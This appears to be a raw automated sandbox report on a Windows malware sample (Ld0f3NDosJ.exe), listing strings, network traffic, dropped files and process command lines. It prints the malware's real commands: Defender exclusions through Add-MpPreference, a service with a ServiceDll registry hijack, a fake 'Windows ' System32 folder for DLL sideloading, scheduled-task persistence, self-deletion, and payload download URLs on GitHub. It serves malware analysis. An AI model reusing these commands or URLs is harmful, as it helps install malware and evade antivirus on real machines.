Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363113098.00007FFDA5547000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000003B.00000002.2612942389.00007FFDA5547000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: http://www.zlib.net/D
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000003B.00000002.2613577176.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/V
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, svchost.exe, 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000003B.00000002.2613047508.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: console_zero.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/docs/copyright.html
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000003B.00000002.2613577176.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, svchost.exe, 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000003B.00000002.2613047508.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: console_zero.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, svchost.exe, 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000003B.00000002.2613047508.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: svchost.exe, 00000035.00000002.3361917101.000001BB8BD29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/panchitopistolesx/items/raw/main/my_backup_a
Source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: https://ipinfo.io/json
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356433154.000001E8BF3C6000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334869302.000001E8BF3C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF3B4000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF3B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/1F7
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/bG
Source: svchost.exe, 00000035.00000003.2846038368.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2914585077.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3178715641.000001BB8BAF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3113596577.000001BB8BAF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3361335703.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3048858018.000001BB8BAF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/_cpu.dat
Source: svchost.exe, 00000035.00000003.2846038368.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2914585077.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3178715641.000001BB8BAF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3113596577.000001BB8BAF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3361335703.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3048858018.000001BB8BAF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/_cpuwsys.dat
Source: svchost.exe, 00000035.00000002.3360728429.000001BB8BA13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/amdg.dat
Source: Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000002.2356237105.000001E8BF34C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356655360.000001E8C10D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe.net1&0
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356655360.000001E8C10D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe06
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356468392.000001E8BF422000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334778364.000001E8BF422000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeC:
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356433154.000001E8BF3D7000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334869302.000001E8BF3D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeLMEM
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeNH
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeQg
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356237105.000001E8BF34C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeU
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356655360.000001E8C10D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exent.com1
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356433154.000001E8BF3C6000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334869302.000001E8BF3C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exes
Source: svchost.exe, 00000035.00000002.3360728429.000001BB8BA13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/nvg.dat
Source: svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3360844690.000001BB8BA48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/usvcusb.dat
Source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3359858423.00000000660F4000.00000008.00000001.01000000.00000013.sdmp String found in binary or memory: https://www.gnu.org/licenses/
Source: svchost.exe String found in binary or memory: https://www.openssl.org/
Source: Ld0f3NDosJ.exe, 00000003.00000003.2284751779.000001E8C10DD000.00000004.00000020.00020000.00000000.sdmp, pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp, svchost.exe, 00000035.00000002.3362491724.00007FFD93C8E000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: https://www.openssl.org/H
Source: unknown Network traffic detected: HTTP traffic on port 63778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63790
Source: unknown Network traffic detected: HTTP traffic on port 63796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63778
Source: unknown Network traffic detected: HTTP traffic on port 63790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 63784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 63799
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:63778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:63784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:63790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:63793 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:63796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:63799 version: TLS 1.2
Source: C:\Windows\System32\svchost.exe Code function: 53_2_00007FFDA5581180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext
Source: C:\Windows\System32\console_zero.exe Code function: 59_2_00007FFDA5581180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext
Source: cmd.exe Process created: 59
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe Code function: 3_2_00007FF646E594B0: DeviceIoControl,GetLastError
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe Code function: 3_2_00007FF646E47800 WTSGetActiveConsoleSessionId,WTSQueryUserToken,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn
Source: C:\Users\user\Desktop\pyld64.exe File created: C:\Windows\System32\usvcinsta64.exe
Source: C:\Windows\System32\usvcinsta64.exe File created: C:\Windows \System32\printui.exe
Source: C:\Windows\System32\usvcinsta64.exe File created: C:\Windows \System32\printui.dll
Source: C:\Windows\System32\cmd.exe File created: C:\Windows
Source: C:\Windows\System32\cmd.exe File created: C:\Windows \System32
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\winsvcf
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\winsvcf\winlogsvc
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcurl.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\zlib1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcrypto-3-x64.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libiconv-2.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libintl-9.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libssl-3-x64.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libwinpthread-1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\console_zero.exe
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libpq.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\x543664.dat
Source: C:\Windows\System32\svchost.exe File created: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\svchost.exe File deleted: C:\Windows\System32\crypti.exe
Source: libiconv-2.dll.40.drStatic PE information: Number of sections : 20 > 10
Source: libintl-9.dll.40.drStatic PE information: Number of sections : 20 > 10
Source: libwinpthread-1.dll.40.drStatic PE information: Number of sections : 12 > 10
Source: Ld0f3NDosJ.exe, 00000003.00000003.2284751779.000001E8C10DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs Ld0f3NDosJ.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f
Source: classification engineClassification label: mal100.evad.winEXE@157/53@5/5
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA37959C0 GetFileAttributesA,GetLastError,_errno,CreateFileA,GetLastError,DeviceIoControl,_errno,GetLastError,FormatMessageA,libintl_gettext,__acrt_iob_func,LocalFree,CloseHandle,_errno,CloseHandle,WideCharToMultiByte,_errno,isalpha,memcpy,53_2_00007FFDA37959C0
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_roxaabse.lav.ps1
Source: Ld0f3NDosJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Ld0f3NDosJ.exeReversingLabs: Detection: 52%
Source: Ld0f3NDosJ.exeVirustotal: Detection: 54%
Source: svchost.exeString found in binary or memory: -start
Source: svchost.exeString found in binary or memory: -addr
Source: svchost.exeString found in binary or memory: ../../gettext-runtime/intl/loadmsgcat.c
Source: unknownProcess created: C:\Users\user\Desktop\Ld0f3NDosJ.exe "C:\Users\user\Desktop\Ld0f3NDosJ.exe"
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Users\user\Desktop\pyld64.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\pyld64.exe "C:\Users\user\Desktop\pyld64.exe"
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\Ld0f3NDosJ.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\usvcinsta64.exe "C:\Windows\System32\usvcinsta64.exe"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld64.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f && sc start x543664
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x543664
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k DcomLaunch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: unknownProcess created: C:\Windows\System32\console_zero.exe C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
